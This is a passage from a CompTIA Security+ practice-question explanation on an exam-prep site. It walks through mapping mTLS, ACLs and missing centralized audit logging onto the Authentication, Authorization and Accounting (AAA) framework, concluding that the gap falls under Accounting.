Mutual TLS (mTLS) validates system identity (Authentication) and ACLs restrict write actions (Authorization).
Identifying existing controls determines which components of AAA are already present.
2
Determine the unaddressed operational requirement.
The system fails to log timestamped upload events and configuration modifications centrally.
Identifying the gap isolates the unfulfilled security function.
3
Map the missing capability to AAA framework pillars.
Logging, monitoring, and audit logging correspond to Accounting.
Accounting specifically covers tracking activity and maintaining audit trails.

Anahtar Kavram

Authentication, Authorization, and Accounting (AAA)
Tahmini Süre:1m 15s
ÖncekiSayfa 80 / 112Sonraki
Tüm alıştırma soruları — CompTIA Security+ | Examkin